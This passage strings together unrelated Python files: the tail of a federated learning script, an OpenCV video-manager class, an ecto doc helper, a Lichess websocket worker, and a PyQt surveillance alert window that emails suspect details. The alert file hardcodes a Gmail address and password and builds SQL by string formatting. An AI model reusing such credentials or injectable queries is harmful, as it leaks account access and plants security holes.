"FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format( device_index, samples, devices, 
active_devices_per_round, number_of_batches, batch_size), dict_1) else: # CL sio.savemat( "results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( samples, devices, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) break if __name__ == "__main__": # GPU memory growth limitation gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: try: # Currently, memory growth needs to be the same across GPUs for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs") except RuntimeError as e: # Memory growth must be set before GPUs have been initialized print(e) if args.resume == 0: # clear all files # DELETE TEMPORARY CACHE FILES fileList = glob.glob('results/*.npy', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('results/*.h5', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('results/*.npz', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('*.mat', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") # main loop for multiprocessing t = [] ############# enable consensus based federation ####################### # federated = False # federated = True ######################################################## ##################### enable parameter server ############## # parameter_server = False server_index = devices # parameter_server = True ######################################################### samples = np.zeros(devices) # training samples per device for id in range(devices): # samples[id]=math.floor(w[id]*validation_train) # samples[id] = math.floor(balancing_vect[id]*fraction_training) samples[id] = training_set_per_device # samples = int(fraction_training/devices) # training samples per device ######################### Create a non-iid assignment ########################## # if args.noniid_assignment == 1: # total_training_size = training_set_per_device * devices # samples = get_noniid_data(total_training_size, devices, batch_size) # while np.min(samples) < batch_size: # samples = get_noniid_data(total_training_size, devices, batch_size) ############################################################################# print(samples) #################################### code testing CL learning (0: data center) # federated = False # parameter_server = False # processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server) ###################################################################################### if federated or parameter_server: for ii in range(devices): # position start if ii == 0: start_index = 0 else: start_index = start_index + int(samples[ii-1]) t = threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)) t.start() # last process is for the target server if parameter_server: print("Target server starting with active devices {}".format(active_devices_per_round)) t = 
threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated, refresh_server)) t.start() else: # run centralized learning on device 0 (data center) processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples) exit(0)
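# Illustrative sketches for the script above. The command lines use the argparse flags
# defined at the top of the file; `fedavg` is a hypothetical stand-in for the weight
# aggregation that processParameterServer() delegates to Parameter_Server, not the
# project's actual implementation.
#
#   python federated_learning_keras_PS_threads_CIFAR100.py -PS 1 -consensus 0 -K 30 -Ka 20
#   python federated_learning_keras_PS_threads_CIFAR100.py -PS 0 -consensus 1 -K 30 -N 2
#
def fedavg(weight_sets):
    # Plain (unweighted) FedAvg: average each layer across the participating devices,
    # where each element of weight_sets is one device's list of numpy weight arrays.
    return [np.mean([weights[k] for weights in weight_sets], axis=0)
            for k in range(len(weight_sets[0]))]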
Management.py
# MIT License
# Copyright (c) 2019 Fernando Perez

import numpy as np
import time
import cv2

try:
    from PIL import Image
except ModuleNotFoundError:
    pass

try:
    # Useful if you want to detect scene changes
    import imagehash
except ModuleNotFoundError:
    pass

try:
    # Useful if you want to track objects
    import dlib
except ModuleNotFoundError:
    pass

from queue import Queue
from threading import Thread


class ManagerCV2():
    """ManagerCV2 helps to manage videos and streams.

    With this class you can iterate over a video frame by frame (and, if you
    want, limit the FPS). You can also register keystrokes with your own
    callback methods in the easiest way. At the same time you can ask this
    manager for the index of the current frame (self.count_frames) and the
    average processing FPS. Finally, you can set a method to execute when the
    iteration finishes.
    """

    _tries_reconnect_stream = 10

    class KeystrokeManager():
        """KeystrokeManager handles all keystrokes during the manager's iteration.

        With this class ManagerCV2 can easily manage each keystroke.
        """

        def __init__(self, **kwargs):
            """KeystrokeManager constructor.

            Keep in mind that with this class you will never get an error when
            you ask for an attribute that doesn't exist: it is created on the
            fly with the value False.

            That is convenient because you can pass no params to this
            constructor, and later, when you need to check whether a keystroke
            was pressed (you really check the param, not the keystroke
            itself), the param simply doesn't exist yet if the key was never
            pressed, and we take care of it for you :)

            Keyword arguments:
            Each keyword argument that you pass to the constructor becomes an
            attribute of this object.
            """
            self.__dict__.update(kwargs)

        def __getattr__(self, attr):
            """Called each time you ask for an attribute that doesn't exist.

            We handle it by creating the attribute with a value of False,
            meaning that the key associated with this parameter hasn't been
            pressed yet.
            """
            self.__dict__[attr] = False
            return False

        def execute_management(self, *args):
            """Toggle the params associated with a pressed key.

            Each time a relevant key is pressed, the associated params are
            flipped (False -> True and back), so you can inspect them and
            decide what to do in each case.
            """
            for arg in args:
                value = getattr(self, arg)
                setattr(self, arg, not value)

    def __init__(self, video, is_stream=False, fps_limit=0, queue_size=256,
                 detect_scenes=False, show_video=False):
        """ManagerCV2 constructor.

        Arguments:
        video -- cv2.VideoCapture that is going to be managed

        Keyword arguments:
        is_stream -- bool indicating whether this is a stream. You don't
            strictly need to set it to True when using a stream; it only
            controls how frame losses are handled. On a stream it is possible
            to lose frames, so if is_stream is True the manager will try to
            reconnect the stream as many times as
            `ManagerCV2._tries_reconnect_stream` indicates. (Default: False)
        fps_limit -- maximum FPS of the video. Set it to 0 for no limit.
            (Default: 0)
        queue_size -- maximum number of frames to store in the queue (for
            multiprocessing). (Default: 256)
        detect_scenes -- bool indicating whether to detect scene changes. It
            has a small impact on the frame rate, almost none for a video with
            fps_limit < 60. (Default: False)
        show_video -- bool indicating whether to show the video (with
            cv2.imshow). If you use the method `add_keystroke` you don't need
            this param (it is fine if you still want to set it to True). If
            you don't want to show the video, leave it as False.
            (Default: False)
        """
        # Video/stream management attributes
        self.video = video
        self.is_stream = is_stream
        self.stream = video
        self.fps_limit = fps_limit
        self.show_video = show_video
        self.queue_size = queue_size
        self.stream_error = False
        self.stopped = False
        self.queue = None
        self.queue_thread = None
        self.awake_thread = None

        # Keystroke attributes
        self.key_manager = ManagerCV2.KeystrokeManager()
        self.last_keystroke = -1
        self.__keystroke_dict = {
            # The first three elements will always have the same length
            'keystroke': [],
            'wait_key': [],
            'keystroke_args': [],
            'exit_keystrokes': [],
        }
        self.ret_handler = None
        self.ret_handler_args = ()
        self.ret_handler_kwargs = {}

        # Additional features
        self.initial_time = None
        self.final_time = None
        self.count_frames = 0

        # Scene detection
        self.detect_scenes = detect_scenes
        self.new_scene = False
        self.previous_frame_hash = None
        self.hash_distance = 25

        # Tracking algorithm
        self.selector_tracker = None
        self.trackers = []

    def __iter__(self):
        self.initial_time = time.time()
        self.last_frame_time = self.initial_time
        self.final_time = self.initial_time
        self.count_frames = 0
        self.last_keystroke = -1

        # All queue management
        self.stopped = False
        self.queue = Queue(maxsize=self.queue_size)
        self.queue_awake = Queue(maxsize=1)
        self.queue_thread = Thread(target=self.fill_queue, args=())
        self.queue_thread.daemon = True
        self.queue_thread.start()
        return self

    def __next__(self):
        # Get frame from queue if not stopped yet
        if self.stopped and self.queue.qsize() == 0:
            self.end_iteration()

        frame, frame_hash = self.queue.get(block=True)
        # This is how it communicates with the thread (to signal it took something)
        if not self.queue_awake.full():
            self.queue_awake.put(None)

        # If we get a frame but it is None, it means that we finished the queue
        if frame is None:
            self.end_iteration()

        # Scene detection, if requested
        if self.detect_scenes:
            if not self.previous_frame_hash:
                self.new_scene = True
            else:
                self.new_scene = (frame_hash - self.previous_frame_hash > self.hash_distance)
            self.previous_frame_hash = frame_hash

        self.final_time = time.time()
        self.count_frames += 1

        # If one of the registered keystrokes is pressed, run its management
        for i, wait_key in enumerate(self.__keystroke_dict['wait_key']):
            self.last_keystroke = cv2.waitKey(wait_key)
            if self.last_keystroke in self.__keystroke_dict['keystroke']:
                index = self.__keystroke_dict['keystroke'].index(self.last_keystroke)
                self.key_manager.execute_management(*self.__keystroke_dict['keystroke_args'][index])
            if self.last_keystroke in self.__keystroke_dict['exit_keystrokes']:
                self.end_iteration()

        # If no keystroke was added we should still wait a minimum so that
        # cv2.imshow can render the video (if you indicated that you want to
        # display it). You can also wait by yourself (without using the manager).
        if self.show_video and not self.__keystroke_dict['wait_key']:
            cv2.waitKey(1)

        # Here we limit the speed (if we want constant frames)
        if self.fps_limit:
            time_to_sleep = (1 / self.fps_limit) - (time.time() - self.last_frame_time)
            if time_to_sleep > 0:
                time.sleep(time_to_sleep)
            self.last_frame_time = time.time()
        return frame

    def fill_queue(self):
        # Keep looping infinitely
        while True:
            # If the thread indicator variable is set, stop the thread
            if self.stopped:
                return

            if not self.queue.full():
                ret, frame = self.video.read()
                # When streaming we can lose frames, so this variable records
                # whether the last read failed (see is_error_last_frame)
                self.stream_error = not ret

                # If it is a stream we will try to reconnect
                if self.is_stream and not ret:
                    for i in range(ManagerCV2._tries_reconnect_stream):
                        ret, frame = self.video.read()
                        if ret:
                            break
                        if i + 1 == ManagerCV2._tries_reconnect_stream:
                            self.stop_queue()
                            return
                elif not ret:
                    self.stop_queue()
                    return

                frame_hash = None
                if self.detect_scenes:
                    frame_hash = imagehash.dhash(Image.fromarray(frame))
                self.queue.put((frame, frame_hash))
            else:
                # Wait until the consumer wakes me up
                self.queue_awake.get()

    def stop_queue(self):
        self.stopped = True
        self.queue.put((None, None))

    def set_tracking(self, selector, frame):
        self.selector_tracker = selector
        self.trackers = []

        rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        height, width, _ = rgb_frame.shape
        for selection in self.selector_tracker.zones:
            if self.selector_tracker.normalized:
                selection = (int(selection[0] * width), int(selection[1] * height),
                             int(selection[2] * width), int(selection[3] * height))
            tracker = dlib.correlation_tracker()
            tracker.start_track(rgb_frame, dlib.rectangle(*selection))
            self.trackers.append(tracker)

    def get_tracking(self, frame):
        rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        height, width, _ = rgb_frame.shape
        for i, tracker in enumerate(self.trackers):
            tracker.update(rgb_frame)
            pos = tracker.get_position()
            selection = (int(pos.left()), int(pos.top()), int(pos.right()), int(pos.bottom()))
            if self.selector_tracker.normalized:
                selection = (selection[0] / width, selection[1] / height,
                             selection[2] / width, selection[3] / height)
            self.selector_tracker.zones[i] = selection
        return self.selector_tracker

    def set_ret_handler(self, method, *args, **kwargs):
        """Set the method to execute when the video/stream finishes.

        Arguments:
        method -- method to execute
        args -- arguments to pass to the method
        kwargs -- keyword arguments to pass to the method
        """
        self.ret_handler = method
        self.ret_handler_args = args
        self.ret_handler_kwargs = kwargs

    def add_keystroke(self, keystroke, wait_key, *args, exit=False):
        """Register params to toggle when a key is pressed.

        Arguments:
        keystroke -- key to check if pressed
        wait_key -- ms to wait for the key (it works exactly as cv2.waitKey)
        args -- params of the KeystrokeManager to toggle when the key is pressed
        exit -- if True, pressing the key also ends the iteration
        """
        self.__keystroke_dict['keystroke'].append(keystroke)
        self.__keystroke_dict['wait_key'].append(wait_key)
        self.__keystroke_dict['keystroke_args'].append(args)
        if exit:
            self.__keystroke_dict['exit_keystrokes'].append(keystroke)

    def get_last_keystroke(self):
        """Return the last pressed keystroke (not necessarily in the last frame)."""
        return self.last_keystroke

    def end_iteration(self):
        """Internal method to finish the iteration with the configured handler."""
        self.stopped = True
        self.video.release()
        if self.ret_handler:
            self.ret_handler(*self.ret_handler_args, **self.ret_handler_kwargs)
        raise StopIteration

    def get_fps(self):
        """Return the average FPS."""
        return round(self.count_frames / (self.final_time - self.initial_time), 3)

    def is_error_last_frame(self):
        """Return True if the last frame was lost, else False (only useful for streams)."""
        return self.stream_error
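# Minimal usage sketch (the video path is a placeholder): iterate a video at a
# capped 30 FPS, stop on ESC, and print the measured average FPS at the end.
if __name__ == '__main__':
    manager = ManagerCV2(cv2.VideoCapture('video.mp4'), fps_limit=30)
    manager.add_keystroke(27, 1, 'esc_pressed', exit=True)  # 27 == ESC key
    for frame in manager:
        cv2.imshow('ManagerCV2', frame)
    print('Average FPS:', manager.get_fps())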
doc.py
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the Willow Garage, Inc. nor the names of its
#       contributors may be used to endorse or promote products derived from
#       this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
'''
Created on Mar 12, 2011

@author: ethan.rublee@gmail.com (Ethan Rublee)
'''
import ecto
import sys
import inspect
from pydoc import ispackage
from inspect import ismodule
import multiprocessing


def print_tendrils(tendril, n):
    for x in tendril:
        value = str(x.data().get())
        print(" - " + x.key() + " [%s]" % x.data().type_name + " default = %s" % value)
        print("")
        docstr = str(x.data().doc)
        doclines = docstr.splitlines()
        if doclines:
            for docline in doclines:
                print(" " + docline)
            print("")


def print_module_doc(m):
    print(m.__doc__)


def list_all_cells(pymodule):
    '''
    Creates a list of all cells from a python module, which are ready for
    doc string and other types of introspection.
    '''
    l = []
    for x in dir(pymodule):
        mod = getattr(pymodule, x)
        if inspect.isclass(mod) and getattr(mod, '__looks_like_a_cell__', False):
            l.append(mod)
    return l

list_all_ecto_modules = list_all_cells


def list_cells(pymodule):
    l = []
    for x in dir(pymodule):
        mod = getattr(pymodule, x)
        if inspect.isclass(mod) and getattr(mod, '__looks_like_a_cell__', False):
            l.append(mod)
    return l

list_ecto_module = list_cells


def view_plasm(plasm, title=None):
    process = multiprocessing.Process(target=ecto.impl.view_plasm, args=(plasm, title))
    process.daemon = True
    process.start()
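A hedged sketch of how these introspection helpers fit together; `my_cells` is a hypothetical module that defines ecto cells:

import my_cells  # hypothetical ecto cell module

for cell in list_cells(my_cells):
    print_module_doc(cell)

# Render an ecto graph in a background process (assumes the usual ecto.Plasm API).
plasm = ecto.Plasm()
view_plasm(plasm, title='my graph')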
worker.py
import Queue
import threading
import websocket
import json
import time

from django.utils import timezone
from datetime import timedelta


def _run_worker():
    while True:
        _, fn, args = _work_queue.get()
        try:
            fn(*args)
        except:
            pass

_work_queue = Queue.PriorityQueue()
_worker_thread = threading.Thread(target=_run_worker)
_worker_thread.daemon = True
_worker_thread.start()


def queue_work(priority, fn, *args):
    _work_queue.put((-priority, fn, args))


def _run_socket():
    global _websocket
    last_start = None
    fallback = 2
    while True:
        try:
            if last_start is not None and last_start > timezone.now() - timedelta(seconds=10):
                time.sleep(fallback)
                fallback = fallback * 2
                if fallback > 120:
                    fallback = 120
            else:
                fallback = 2
            last_start = timezone.now()
            _websocket = websocket.create_connection('wss://socket.lichess.org/api/socket')
            with _games_lock:
                for game_id in _games.keys():
                    _start_watching(game_id)
            while True:
                msg = json.loads(_websocket.recv())
                if msg['t'] == 'fen':
                    with _games_lock:
                        game_id = msg['d']['id']
                        if game_id in _games:
                            _games[game_id] = msg
        except:
            continue


def _start_watching(game_id):
    try:
        _websocket.send(json.dumps({'t': 'startWatching', 'd': game_id}))
    except:
        pass

_websocket = None
_games = {}
_games_lock = threading.Lock()
_socket_thread = threading.Thread(target=_run_socket)
_socket_thread.daemon = True
_socket_thread.start()


def watch_games(game_ids):
    with _games_lock:
        game_id_set = set(game_ids)
        for game_id in set(_games.keys()) - game_id_set:
            del _games[game_id]
        for game_id in game_id_set - set(_games.keys()):
            _games[game_id] = None
            _start_watching(game_id)
        return [_games[game_id] for game_id in game_ids]


def add_watch(game_id):
    with _games_lock:
        if game_id not in _games:
            _games[game_id] = None
            _start_watching(game_id)
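A usage sketch for the two background threads above (the game id is a placeholder; priorities are arbitrary integers, and larger values run first because of the negation in queue_work):

def log_game(game_id):
    print('processing %s' % game_id)

queue_work(10, log_game, 'abcd1234')  # placeholder game id

# Poll the latest 'fen' message (or None) for each watched game.
states = watch_games(['abcd1234'])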
Alert_Area2.py
# -*- coding: utf-8 -*-

from PyQt5 import QtCore, QtGui, QtWidgets
import pygame
import pymysql
from PyQt5.QtCore import QTimer
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import multiprocessing
import datetime


class Ui_Alert2(object):
    update = 1
    count = 0
    tw = time.time()
    flag = False

    def __init__(self, num):
        self.num = num
        self.timer = QTimer()
        # set timer timeout callback function
        self.timer.timeout.connect(self.viewcam)

    def viewcam(self):
        t1 = time.time()
        if t1 - self.tw >= self.update:
            self.count += 1
            con = self.num - self.count
            self.btn_sndmail.setText('Send Mail ' + str(con))
            print(con)
            if con == 0:
                print('Send Mail')
                self.count = 0
                self.btn_sndmail.setText('Send')
                self.timer.stop()
                P1 = multiprocessing.Process(target=self.send_mail)
                P1.start()
            self.tw = time.time()

    def controlTimer(self):
        # start the countdown timer if it is stopped
        if not self.timer.isActive():
            self.timer.start(20)

    def stop_(self):
        self.btn_sndmail.setText('Send Mail')
        self.timer.stop()

    def send_mail(self):
        connection = pymysql.connect("localhost", "root", "rootpass", "project")
        cursor = connection.cursor()
        cursor.execute("select count(*) from inform")
        row = cursor.fetchone()
        total_row = int(row[0])
        print('total row', total_row)
        name = 'Name : ' + self.lineEdit_name.text() + ', '
        age = 'Age : ' + self.lineEdit_age.text() + ', '
        gender = 'Gender : ' + self.lineEdit_gender.text() + ', '
        citizen = ' Nationality : ' + self.lineEdit_nationality.text() + ', '
        other = 'OtherInfo : ' + self.lineEdit_other.text()
        table = '\n' + name + '\n' + age + '\n' + gender + '\n' + citizen + '\n' + other
        cursor.execute("SELECT * FROM inform")
        rw = cursor.fetchone()
        for i in range(total_row):
            email = 'faizk2651@gmail.com'
            password = '9892338308'
            send_to_email = rw[2]
            subject = 'ALERT!'
            address = 'Goregaon(W),Patkar College'
            message = (rw[1] + ' this is an autogenerated mail to alert you, a suspicious'
                       ' person is detected on Date/Time ' + self.curr_dt + ' at Address: '
                       + address + '. Suspect Information : ' + table)
            files = [self.enrolled_img, self.lastmatch_img]

            msg = MIMEMultipart()
            msg['To'] = send_to_email
            msg['From'] = email
            msg['Subject'] = subject
            body = MIMEText(message, 'html', 'utf-8')
            msg.attach(body)  # add message body (text or html)
            for f in files:  # add files to the message
                attachment = MIMEApplication(open(f, "rb").read(), _subtype="txt")
                attachment.add_header('Content-Disposition', 'attachment', filename=f)
                msg.attach(attachment)

            server = smtplib.SMTP('smtp.gmail.com', 587)
            server.starttls()
            # log in with the sender account, not the recipient address
            server.login(email, password)
            text = msg.as_string()
            server.sendmail(email, send_to_email, text)
            print(str(i), ' ', rw[1])
            rw = cursor.fetchone()
            server.quit()

    def display_profile(self, f_name, f_name2):
        self.curr_dt = str(datetime.datetime.now())
        connection = pymysql.connect("localhost", "root", "rootpass", "project")
        cursor = connection.cursor()
        select_query = "select * from blockacess where fname ='%s'" % (f_name)
        cursor.execute(select_query)
        row = cursor.fetchone()
        self.lineEdit_id.setText(str(row[0]))
        self.lineEdit_name.setText(row[1])
        self.lineEdit_age.setText(row[3])
        self.lineEdit_gender.setText(row[4])
        self.lineEdit_nationality.setText(row[5])
        self.lineEdit_other.setText(row[6])
        self.lineEdit_datetime.setText(self.curr_dt)
        self.enrolled_img = 'Registered/' + f_name + '.jpg'
        self.lastmatch_img = 'Monitor/Registered/' + f_name + '/' + f_name2
        pixmap = QtGui.QPixmap('Registered/' + f_name + '.jpg')
        pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(),
                               QtCore.Qt.KeepAspectRatio)
        self.label_img1.setPixmap(pixmap)
        self.label_img1.setAlignment(QtCore.Qt.AlignCenter)
        pixmap = QtGui.QPixmap('Monitor/Registered/' + f_name + '/' + f_name2)
        pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(),
                               QtCore.Qt.KeepAspectRatio)
        self.label_img2.setPixmap(pixmap)
        self.label_img2.setAlignment(QtCore.Qt.AlignCenter)
        P1 = multiprocessing.Process(target=self.view)
        P1.start()

    def view(self):
        ID = int(self.lineEdit_id.text())
        connection = pymysql.connect("localhost", "root", "rootpass", "project")
        cursor = connection.cursor()
        select_query = ("select count(*) from view where id =%d") % (ID)
        cursor.execute(select_query)
        r = cursor.fetchone()
        v = int(r[0]) + 1
        insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v)
        cursor.execute(insert_query)
        connection.commit()
        connection.close()

    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(681, 343)
        MainWindow.setStyleSheet("*{\n"
                                 " color:rgb(186, 189, 182);\n"
                                 " background:rgb(46, 52, 54);\n"
                                 " font: 12pt \"URW Gothic L\";\n"
                                 "}\n"
                                 "QLineEdit{\n"
                                 " color:rgb(238, 238, 236);\n"
                                 " border:1px solid rgb(186, 189, 182);\n"
                                 " \n"
                                 "}")
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.label_img1 = QtWidgets.QLabel(self.centralwidget)
        self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161))
        self.label_img1.setStyleSheet("QLabel{\n"
                                      " border:1px solid rgb(211, 215, 207);\n"
                                      "}")
        self.label_img1.setText("")
        self.label_img1.setObjectName("label_img1")
        self.label_img2 = QtWidgets.QLabel(self.centralwidget)
        self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161))
        self.label_img2.setStyleSheet("QLabel{\n"
                                      " border:1px solid rgb(211, 215, 207);\n"
                                      "}")
        self.label_img2.setText("")
        self.label_img2.setObjectName("label_img2")
        self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget)
self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41)) self.btn_stopsiren.setStyleSheet("QPushButton{\n" " border:1px solid red; \n" " background:rgb(239, 41, 41);\n" " border-radius:15px;\n" " color:white;\n" "}\n" "QPushButton:hover{\n" " border:1px solid white;\n" "}") self.btn_stopsiren.setObjectName("btn_stopsiren") self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget) self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41)) self.btn_sndmail.setStyleSheet("QPushButton{\n" " border:1px solid rgb(52, 101, 164); \n" " background:rgb(52, 101, 164);\n" " border-radius:15px;\n" " color:white;\n" "}\n" "QPushButton:hover{\n" " border: 1px solid white;\n" "}") self.btn_sndmail.setObjectName("btn_sndmail") self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21)) self.lineEdit_id.setObjectName("lineEdit_id") self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21)) self.lineEdit_name.setObjectName("lineEdit_name") self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21)) self.lineEdit_age.setObjectName("lineEdit_age") self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21)) self.lineEdit_gender.setObjectName("lineEdit_gender") self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21)) self.lineEdit_nationality.setObjectName("lineEdit_nationality") self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21)) self.lineEdit_other.setObjectName("lineEdit_other") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17)) self.label_3.setObjectName("label_3") self.label_4 = QtWidgets.QLabel(self.centralwidget) self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17)) self.label_4.setObjectName("label_4") self.label_5 = QtWidgets.QLabel(self.centralwidget) self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21)) self.label_5.setObjectName("label_5") self.label_6 = QtWidgets.QLabel(self.centralwidget) self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17)) self.label_6.setObjectName("label_6") self.label_7 = QtWidgets.QLabel(self.centralwidget) self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21)) self.label_7.setObjectName("label_7") self.label_8 = QtWidgets.QLabel(self.centralwidget) self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17)) self.label_8.setObjectName("label_8") self.label_9 = QtWidgets.QLabel(self.centralwidget) self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17)) self.label_9.setObjectName("label_9") self.label_11 = QtWidgets.QLabel(self.centralwidget) self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31)) self.label_11.setStyleSheet("QLabel{\n" " color:rgb(115, 210, 22);\n" " border:1px solid red;\n" "}") self.label_11.setObjectName("label_11") self.label_12 = QtWidgets.QLabel(self.centralwidget) self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41)) self.label_12.setStyleSheet("QLabel{\n" " color:white; \n" " font: 63 23pt \"URW Gothic L\";\n" "}") self.label_12.setObjectName("label_12") self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21)) self.lineEdit_datetime.setObjectName("lineEdit_datetime") self.label_13 = 
QtWidgets.QLabel(self.centralwidget) self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21)) self.label_13.setStyleSheet("QLabel{\n" " color:white;\n" "}") self.label_13.setObjectName("label_13") self.label_14 = QtWidgets.QLabel(self.centralwidget) self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21)) self.label_14.setStyleSheet("QLabel{\n" " color:white;\n" "}") self.label_14.setObjectName("label_14") MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) pygame.mixer.init() pygame.mixer.music.load('Sound/siren.wav') pygame.mixer.music.play(0) self.P2 = multiprocessing.Process(target=self.send_mail) self.btn_sndmail.clicked.connect(self.P2.start) self.btn_stopsiren.clicked.connect(self.stop_) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Area-2")) self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail")) self.btn_sndmail.setText(_translate("MainWindow", "Send Mail")) self.label_3.setText(_translate("MainWindow", "ID")) self.label_4.setText(_translate("MainWindow", "Name ")) self.label_5.setText(_translate("MainWindow", "Age")) self.label_6.setText(_translate("MainWindow", "Gender")) self.label_7.setText(_translate("MainWindow", "Nationality")) self.label_8.setText(_translate("MainWindow", "Other Info")) self.label_9.setText(_translate("MainWindow", "Date/Time")) self.label_11.setText(_translate("MainWindow", "Match Found")) self.label_12.setText(_translate("MainWindow", "ALERT!!!")) self.label_13.setText(_translate("MainWindow", "Enrolled Photo")) self.label_14.setText(_translate("MainWindow", "Last Match")) import img
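A hypothetical launcher for the dialog above; it assumes the MySQL schema, the Registered/ and Monitor/ image folders, and Sound/siren.wav that the class already expects, with placeholder file names:

if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    ui = Ui_Alert2(num=10)  # auto-mail after 10 timer ticks
    ui.setupUi(window)
    ui.display_profile('suspect1', 'match1.jpg')  # placeholder names
    ui.controlTimer()
    window.show()
    sys.exit(app.exec_())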
utils.py
import os
import subprocess
from pathlib import Path
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union

import pydantic

from python_on_whales.exceptions import DockerException, NoSuchImage, NoSuchService

PROJECT_ROOT = Path(__file__).parents[1]


def title_if_necessary(string: str):
    if string.isupper():
        return string
    else:
        return string.title()


def to_docker_camel(string):
    try:
        # NOTE: a few keys keep misspellings ("lenght", "adress"); the alias
        # generator is called with the models' field names, so these keys must
        # match those names exactly.
        special_cases = {
            "exec_ids": "ExecIDs",
            "sandbox_id": "SandboxID",
            "oom_killed": "OOMKilled",
            "rw": "RW",
            "link_local_ipv6_address": "LinkLocalIPv6Address",
            "link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen",
            "secondary_ipv6_addresses": "SecondaryIPv6Addresses",
            "endpoint_id": "EndpointID",
            "global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen",
            "ip_adress": "IPAddress",
            "ip_prefix_lenght": "IPPrefixLen",
